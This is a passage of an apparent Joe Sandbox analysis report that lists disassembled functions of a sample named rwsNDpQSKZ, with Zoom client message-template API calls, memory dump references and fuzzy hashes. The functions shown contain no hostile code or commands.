                • Instruction Fuzzy Hash: BDE092B0A0139167CB34AB108C45B2EA6B4AB90757F000618B6015A392CBF84984DB76
                Function 00C70900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70907
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.log.subchannel_remove,00009DA3,ChannelId,00000004), ref: 00C70922
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ChannelId$com.zoom.app.log.subchannel_remove
                • API String ID: 4281283084-3665214052
                • Opcode ID: 6f70fd332cfa5af1a7b3494b53aa804f7bef546d2a81ec83edceac8a6dae61b5
                • Instruction ID: a7f3a106ce842624b582951c60efc6196f06627e56f682d96b46be38a064cb6a
                • Opcode Fuzzy Hash: 6f70fd332cfa5af1a7b3494b53aa804f7bef546d2a81ec83edceac8a6dae61b5
                • Instruction Fuzzy Hash: B4E06FB0A40380E7C7217B008C89B9EA2A4AB80B1AF504928F2004B3C3CBF48840DBB4
                Function 00C6E910 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E917
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.get.service.status.response,00009DD5,status,00000004), ref: 00C6E932
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.get.service.status.response$status
                • API String ID: 4281283084-1970149147
                • Opcode ID: 3e833d5a32e04e3167e3c5145c347c6e48253101ff121e16ea6df0fef4b60614
                • Instruction ID: dd162463116944af6a58060e180872399734636abb44fe0b87d8d60917ac3d8e
                • Opcode Fuzzy Hash: 3e833d5a32e04e3167e3c5145c347c6e48253101ff121e16ea6df0fef4b60614
                • Instruction Fuzzy Hash: BFE0D8B0A4035197C7217B159C49F5E66E49F40716F544469B5015B3C2CBF44841DF78
                Function 00C76AC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76AC7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.ps.query.component.exist,0001388A,componentType,00000004), ref: 00C76AE2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.ps.query.component.exist$componentType
                • API String ID: 4281283084-621653104
                • Opcode ID: b0af552c073a34a6ac72f3c573800e414fd739f4d71bb80b084f85eb4931a188
                • Instruction ID: 907844831efb3071c9564665a7688496b4836bfc6d2b9246eba9848fb2e74b6b
                • Opcode Fuzzy Hash: b0af552c073a34a6ac72f3c573800e414fd739f4d71bb80b084f85eb4931a188
                • Instruction Fuzzy Hash: 53E0D8F1A4079067C7227B148C4975E66A4AB50B17F90066CF1455A3C2CBF84941EB75
                Function 00C74AF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74AF7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.subscribe.presence.expire,00002782,UserList,00000004), ref: 00C74B12
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserList$com.Zoom.app.conf.subscribe.presence.expire
                • API String ID: 3166440930-3374428609
                • Opcode ID: 39d84e5fac6e69879e363c5ba51768d3cbeafa49c05fc0286ddeb5b3968ca6e1
                • Instruction ID: 88048c47ea59ab6cd44429542bf47ad077b71640cbe9bbb91cc62d93028946d5
                • Opcode Fuzzy Hash: 39d84e5fac6e69879e363c5ba51768d3cbeafa49c05fc0286ddeb5b3968ca6e1
                • Instruction Fuzzy Hash: 2EE06FF0A007C0A7D7307B018C48B1E26B8EB40B0AF80863CB6095B382CBF48D80EB71
                Function 00C74A90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74A97
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.get.presence.response,00002781,UserList,00000004), ref: 00C74AB2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserList$com.Zoom.app.conf.get.presence.response
                • API String ID: 3166440930-3636466401
                • Opcode ID: 0e2ecff73d9e5c3159e00f849840337c17b31b0f8e3721ab6995db993fa41c2d
                • Instruction ID: 19ba3ffe48d5172896e5124afe9add5334e636b861f4f44441b6ff40b4ca6794
                • Opcode Fuzzy Hash: 0e2ecff73d9e5c3159e00f849840337c17b31b0f8e3721ab6995db993fa41c2d
                • Instruction Fuzzy Hash: 99E0D8B4A007807BD7207B158C89B1F66B4DB80715F504528B5255B3D2CBF44984EB74
                Function 00C72A50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72A57
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.useaudio.request,00009E90,bUse,00000004), ref: 00C72A72
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: bUse$com.zoom.app.cci.ccivideo.useaudio.request
                • API String ID: 4281283084-3954845615
                • Opcode ID: 252699219401d5ce0cf2a6e7e0e645b55a3cd5f97f38584d6f141859e4c3917f
                • Instruction ID: f46e30ca2c4087aab0ce167569d5e6d771cfcbd1182e1598a9fa7e8747041621
                • Opcode Fuzzy Hash: 252699219401d5ce0cf2a6e7e0e645b55a3cd5f97f38584d6f141859e4c3917f
                • Instruction Fuzzy Hash: AAE0D8B194078067D720BF14CC4672E26F4A750B1AFE44469B10C5F392CBF54881E7B8
                Function 00C6CA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CA17
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.report.issue,0000275A,jsonValue,00000004), ref: 00C6CA32
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.pt.report.issue$jsonValue
                • API String ID: 3166440930-624225280
                • Opcode ID: 69c35dcbf5f5025c4d2d77bd997575a68f66f4de7e7f46a3e5ad6c337e12b09f
                • Instruction ID: 0b94650302a820aa75488442b195ae8f9431aeb4ef14d5c21156d6e0f822a9bf
                • Opcode Fuzzy Hash: 69c35dcbf5f5025c4d2d77bd997575a68f66f4de7e7f46a3e5ad6c337e12b09f
                • Instruction Fuzzy Hash: EEE0D8B0A00390A7D7307B158C85B1E66B4AB51F16F44452CB2015B392CBF54844DBB9
                Function 00C6CB90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CB97
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.audio.configure.response,00009C60,Result,00000004), ref: 00C6CBB2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
